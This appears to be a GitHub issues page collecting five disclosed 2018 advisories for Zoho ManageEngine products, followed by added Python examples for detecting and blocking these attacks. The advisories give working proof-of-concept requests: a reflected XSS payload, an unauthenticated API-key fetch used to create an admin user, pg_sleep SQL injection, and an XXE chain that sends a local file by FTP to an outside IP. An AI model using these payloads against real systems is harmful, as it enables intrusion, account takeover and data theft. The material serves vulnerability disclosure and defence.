
forcve's Issues

[CVE-2018-15169] Zoho ManageEngine Applications Manager Reflected XSS

Zoho ManageEngine Applications Manager 13 (13810 build) Reflected XSS

Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE: CVE-2018-15169

I found a reflected XSS in Zoho ManageEngine Applications Manager 13 (13810 build) via the method parameter in a /deleteMO.do?listview=true&method=deleteMO&viewmontype= GET request.

Proof of Concept

/deleteMO.do?listview=true&method=deleteMO</textarea><script>alert(document.domain)</script>//&viewmontype=

Local test: (screenshot)

Demo site test: (screenshot)

Notice: This vulnerability can be reproduced without logging in.

The vendor has fixed the vulnerability:
https://www.manageengine.com/products/applications_manager/issues.html

[CVE-2018-17283] Zoho ManageEngine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection

Zoho ManageEngine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection

Date: 2018/09/03
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]

Firewall Analyzer 12.3 Build 123183 has a permission bypass vulnerability that can lead to information disclosure and SQL injection.

Proof of Concept:

Getting the API key without authorization:

GET /oputilsServlet?action=getAPIKey HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

Local site test: (screenshot)

Adding an admin user using only the API key (PoC):

POST /api/json/v2/admin/addUser?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&[email protected]&privilege=Administrator&[email protected]&landLine=1&mobileNo=1&sipenabled=true&tZone=Asia/Irkutsk&allDevices=true&authentication=local&fwaresources=&ncmallDevices=true HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: en-US;q=0.8,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/apiclient/ember/index.jsp
Content-Length: 566
Content-Type: multipart/form-data; boundary=---------------------------195342410120122
Connection: close

-----------------------------195342410120122
Content-Disposition: form-data; name="DevGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="IPGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="InterfaceGroup"


-----------------------------195342410120122
Content-Disposition: form-data; name="password"

test123
-----------------------------195342410120122
Content-Disposition: form-data; name="profileImg"

undefined
-----------------------------195342410120122--

Local site test: (screenshots)

SQL injection using only the API key (PoC):

POST /api/json/device/setManaged?apiKey=f1fdf3746bb68570c1cb28610f7ebee5&manage=false HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.159.1:80
Host: 192.168.159.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

name=KcP7OGhC';select%20pg_sleep(1);%20-- 


[CVE-2018-13050] Zoho ManageEngine Applications Manager SQL Injection vulnerability

Zoho ManageEngine Applications Manager SQL Injection vulnerability

Date: 2018/07/02
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE: CVE-2018-13050

Proof of Concept:

POST /j_security_check HTTP/1.1
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9090/
Cookie: JSESSIONID_APM_9090=CFE9FA9A1A9EF400DC88681BF3F580F4; testcookie=; am_username=; am_check=
Host: 127.0.0.1:9090
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

submit=Login&clienttype=html&j_password=g00dPa%24%24w0rD&j_username=5mwETOWO';select%20pg_sleep(0);%20--%20&remember=on&ScreenHeight=709&ScreenWidth=1280&username=rrkfpycm&webstart=

This is a time-based blind SQL injection vulnerability, so I used sqlmap to exploit it. The following is a proof screenshot:
(screenshot)
Databases: (screenshot)
User: (screenshot)
Table: (screenshot)
Data: (screenshot)

[CVE-2018-18980] Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability

Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability

Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]

An XML External Entity injection (XXE) vulnerability exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.

My VPS's evil.xml:

<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;


I used the FTP protocol to read the file; it can read the file c:\test.txt.

The test.txt file is just for testing.
(screenshot)

Then I used the PoC to request my VPS's evil.xml.

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>

The vulnerability exists in /devices/ProcessRequest.do?RequestID=463&RequestXML=, so I tested it with the URL-encoded PoC.

http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E

On my VPS, I used a Python script to open an FTP listener to accept the data.
(screenshot)

When I sent the request, I received the content of test.txt on my VPS.
(screenshots)
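An added defensive example, not part of this advisory or of the vendor's code: a parser for a RequestXML-style parameter that refuses any DOCTYPE and any external entity, so a parameter-entity chain like the evil.xml above is never fetched. The URLs, the attacker.example host and the sample XML are constructed for this example.

```python
import xml.parsers.expat as expat
from urllib.parse import parse_qs, urlsplit


class UnsafeXmlError(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or an external entity."""


def parse_request_xml(xml_text):
    """Parse untrusted XML; return the element names in document order.

    Any DOCTYPE (even one with only an internal subset) and any external
    entity reference aborts the parse, and parameter entities are never
    expanded, so a remote DTD is never requested.
    """
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    seen = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError("DOCTYPE declaration rejected: %s" % name)

    def reject_external_entity(context, base, system_id, public_id):
        raise UnsafeXmlError("external entity rejected: %s" % system_id)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external_entity
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(xml_text, True)  # a handler exception propagates out of Parse
    return seen


def check_process_request_url(url):
    """Pull RequestXML out of a ProcessRequest.do-style URL and vet it."""
    xml_text = parse_qs(urlsplit(url).query).get("RequestXML", [""])[0]
    try:
        return "allowed", parse_request_xml(xml_text)
    except UnsafeXmlError as exc:
        return "blocked", str(exc)
    except expat.ExpatError as exc:
        return "malformed", str(exc)


# Constructed sample inputs (not taken from the advisory): a benign request,
# and one whose RequestXML loads a remote DTD from a placeholder host.
BASE = "http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML="
BENIGN_URL = BASE + "%3Croot%3E%3Cdevice%20id%3D%221%22%2F%3E%3C%2Froot%3E"
XXE_URL = BASE + ("%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C!DOCTYPE%20root%20%5B"
                  "%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fattacker.example"
                  "%2Fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2Froot%3E")
```

Calling check_process_request_url(XXE_URL) returns "blocked" before any network access happens, while the benign URL yields the element names root and device.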

[CVE-2018-15168] Zoho ManageEngine Applications Manager SQL Injection vulnerability

Zoho ManageEngine Applications Manager SQL Injection vulnerability

Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: [email protected]
CVE: CVE-2018-15168

I found a SQL injection in Zoho ManageEngine Applications Manager 13 (13810 build) via the resids parameter in an /editDisplaynames.do?method=editDisplaynames&resids=1 GET request.

Proof of Concept:

GET /editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Connection: close

This is a time-based blind SQL injection vulnerability, so I used sqlmap to exploit it. The following is a proof screenshot:
(screenshot)

To get the admin's password:
(screenshot)

The vendor has fixed the vulnerability:
https://www.manageengine.com/products/applications_manager/issues.html
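An added detection example, not from these advisories or from the vendor, covering the time-based blind SQL injection PoCs in CVE-2018-13050 and CVE-2018-15168 as well as the Firewall Analyzer setManaged request: it URL-decodes request parameters and flags the pg_sleep calls, numeric tautologies and stacked queries those payloads use. The access-log lines, client IPs and the combined-log regex are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Indicators drawn from the PoCs in these advisories: PostgreSQL sleep calls,
# quote-closed numeric tautologies, and stacked queries ending in a comment.
SQLI_PATTERNS = [
    ("pg_sleep", re.compile(r"pg_sleep\s*\(", re.I)),
    ("tautology", re.compile(r"\)?\s+and\s+\(?\s*(\d+)\s*=\s*\1\b", re.I)),
    ("stacked_query", re.compile(r"'\s*;\s*(select|insert|update|delete|drop)\b", re.I)),
    ("comment_tail", re.compile(r"--\s*$|/\*")),
]
# Combined access-log format (Apache/NGINX style); constructed for this example.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_param(value):
    """Undo URL encoding until stable (catches double encoding), then lowercase."""
    prev = None
    while value != prev:
        prev, value = value, unquote_plus(value)
    return value.lower()

def classify(value):
    """Return the indicator names matched by one raw parameter value."""
    decoded = decode_param(value)
    return [name for name, rx in SQLI_PATTERNS if rx.search(decoded)]

def scan_access_log(lines):
    """Return (client ip, path, parameter, indicators) for suspicious requests.

    Only the query string is visible here: the j_security_check and setManaged
    payloads travel in POST bodies, so those need application or WAF logging.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        for key, value in parse_qsl(query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append((m["ip"], path, key, hits))
    return findings

# Constructed sample log lines mirroring the request paths in the advisories.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jul/2018:10:00:01 +0000] "GET /editDisplaynames.do?method=editDisplaynames&resids=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Jul/2018:10:00:02 +0000] "GET /editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Jul/2018:10:00:03 +0000] "POST /j_security_check HTTP/1.1" 200 64',
]
```

Running scan_access_log(SAMPLE_LOG) flags only the resids tautology; classify() can be applied directly to decoded form fields when body logging is available.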
